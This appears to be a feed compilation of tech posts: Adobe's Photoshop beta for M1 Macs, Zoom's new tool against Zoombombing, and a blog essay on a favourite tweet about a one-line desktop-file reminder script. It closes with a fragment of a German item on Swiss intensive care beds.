This beta version of Photoshop requires an Apple silicon Mac, including either the MacBook Air, 13-inch MacBook Pro or Mac mini, as well as ‘version 5.3.1.470’ or later of Creative Cloud’s desktop app.

A statement regarding the first Adobe app to get the M1 treatment can be found below:

“This early version of Photoshop for ‌Apple Silicon‌ offers many of the core Photoshop features that you’ve come to rely on for your day to day editing needs, and we’ll be adding more features in the weeks to come. Note that Beta software is not officially supported yet by Adobe, but we want to hear from you, and this is the place to let us know how it’s going.”

While dropping a beta of Photoshop CC on the same day that Apple’s M1 Macs release is a positive sign, this version of the image editing software is rather limited in some ways.

For example, Camera RAW, Content Aware Fill, Spot Healing Brush and more aren’t available in this version of Photoshop CC. For a full list of missing features, check out Adobe’s M1 Photoshop beta announcement. Given I primarily use Photoshop for resizing images and Lightroom CC for more in-depth photo editing, these limitations aren’t that big of a deal for me.

Adobe previously revealed that an M1 version of Lightroom CC is set to launch in December and that Photoshop CC is coming at some point in 2021. It still remains unclear when Adobe’s entire Creative Cloud suite is coming to Apple’s new M1-powered devices.

It’s also worth noting that Adobe says it doesn’t officially support Rosetta 2 emulation of Creative Cloud apps, though, for the most part, the apps I’ve tried seem to run relatively smoothly.

For more on Apple’s new M1-powered Macs, check out my in-depth look at the powerful new computers.

Source: Adobe Via: MacRumors 

The post Photoshop CC beta for Apple’s M1 Macs is now available appeared first on MobileSyrup.

Zoom is rolling out new security features to allow users to stop ‘Zoombombers’ that may get into meetings uninvited.

Hosts and co-hosts now have the option to pause their meeting and remove a disruptive participant temporarily.

All video, audio, chat, annotation, screen sharing and recording will stop when hosts click the ‘Suspend Participant Activities’ button under the security icon. If a host clicks this button, then breakout rooms will also temporarily end.

Hosts will then be asked if they want to report a user form their meeting, share any other details, and optionally include a screenshot. Once they click ‘Submit,’ the reported user will be removed from the meeting, and Zoom’s security team will be notified.

“Hosts and co-hosts may resume their meeting by individually re-enabling the features they’d like to use. Zoom will also send them an email after the meeting to gather more information,” Zoom outlined in a blog post.

As Zoom gained significant popularity this year due to the COVID-19 pandemic, the company came under fire for an increase of Zoombombing and has since implemented several security features to address the issue.

Source: Zoom

The post Zoom launches new security feature to stop ‘Zoombombers’ appeared first on MobileSyrup.

I wrote my favorite tweet way back in 2013:

That tweet links to a file which is virtually a bash one-liner:

touch ~/Desktop/"$(echo $@)"

I fucking love this tweet. It’s simple, and it’s hilarious. The idea was — especially back then, during the era of Wunderlist and Things and new todo apps being released seemingly every week — that everyone was spending incredibly too much time coming up with ridiculous task systems and convoluted organizational hierarchies. Really, the easier thing is to just drop a blank file on your desktop to remind you to do something, and when you’re done with it, delete the file. Easy. That was my process for getting things done. I’d tried so many different systems… they were all so fucking complicated.

I fucking love this tweet because it’s 100% correct. Circa 2013 me absolutely worked in this manner. I’d have a couple week-long tasks I’d want to build out, or do, or accomplish that week, and then I’d leave a couple of reminders to myself throughout the day as I move in and out of different tiny tasks. It was incredibly insightful to cut through the bullshit and realize I didn’t need anything more complex.

I fucking love this tweet because it’s completely and utterly wrong. I still work in this manner — I have a single file on my desktop right now that’s only there to remind me to try installing room-assistant in the next week or so. And that’s how I use it: “let me kind of keep this in mind to do eventually”. But the thought of basing my whole life and workflow off of such a simple system today seems completely bonkers; it really cracks me up.

Same, but different

Like most people, my life’s gotten more complicated as I’ve gotten older. Gone are the days of my singular focus being that day’s work tasks; they’ve been replaced with needs to keep track of like, paying a bill every thirteen and a half weeks and I really can’t forget that otherwise I don’t know the world will explode or something. I use Things pretty religiously these days, and, much like my calendar, if it’s not on there I’m simply not going to do it.

It’s wrong to couch this as simply a “young people are idiots” tale, though. I mean, yes, they are, but that’s besides the point. I fucking love this tweet because it shows how I’ve changed since then. And I don’t mean that in a negative way: it’s just what ended up happening. Maybe I’ll eventually go back to a simpler approach, maybe I won’t. It’s what works for me now.

I fucking love this tweet not because it’s a good reminder that what someone says today isn’t what they might say the next day or year or decade. Again, it doesn’t make them wrong; it just makes you really question the context of what’s being said (which is something we should all get better at anyway). Someone can both say something that’s wrong to you and correct for them. And sometimes those two people are the same person.

Also I love this tweet because all jokes written out in POSIX shell are hilarious to me.

So yeah, I think it’s a good tweet. It reminds me of where I was and where I am. So it’s my favorite tweet.

I mean, for now.

mkalus shared this story from Fefes Blog.

Die schweizerischen Intensivstationen sind an der Grenze ihrer ordentlichen Bettenkapazitäten, tun aber ihr Möglichstes, um diesen im Vergleich zur ersten COVID-19-Welle erhöhten Zustrom an kritisch kranken Patientinnen und Patienten zu bewältigen